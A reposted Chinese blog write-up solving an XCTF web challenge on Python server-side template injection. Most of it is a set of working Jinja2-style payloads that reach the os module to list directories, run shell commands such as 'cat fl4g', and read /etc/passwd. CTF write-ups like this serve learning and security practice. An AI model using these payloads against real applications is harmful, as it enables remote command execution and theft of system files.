XCTF-Web-高手区-Web_python_template_injection
生活随笔
收集整理的這篇文章主要介紹了
XCTF-Web-高手区-Web_python_template_injection
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
題目
解題
1、題目提示為python模板注入
猜測這里是SSTI(Server-Side Template Injection) 服務端模板注入,就是服務器模板中拼接了惡意用戶輸入導致各種漏洞。通過模板,Web應用可以把輸入轉換成特定的HTML文件或者email格式
2、測試一下
http://111.200.241.244:53038/{{1+1}}經過該測試,說明存在SSTI
3、那么接下來可以使用相關payload進行驗證
(1)payload1
查看所有模塊 http://111.200.241.244:53038/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D(2)payload2
查看當前目錄,發現存在fl4g文件 http://111.200.241.244:53038/{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}} 或 http://111.200.241.244:53038/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}(3)payload3
讀取fl4g文件 http://111.200.241.244:53038/{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}} 或 http://111.200.241.244:53038/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}(4)其它payload
讀取文件 {{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}} {{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
寫入文件
參考:https://www.cnblogs.com/hackxf/p/10480071.html
總結
以上是生活随笔為你收集整理的XCTF-Web-高手区-Web_python_template_injection的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: XCTF-MISC-新手区-功夫再高也怕
- 下一篇: 熵权法 算权重系数 python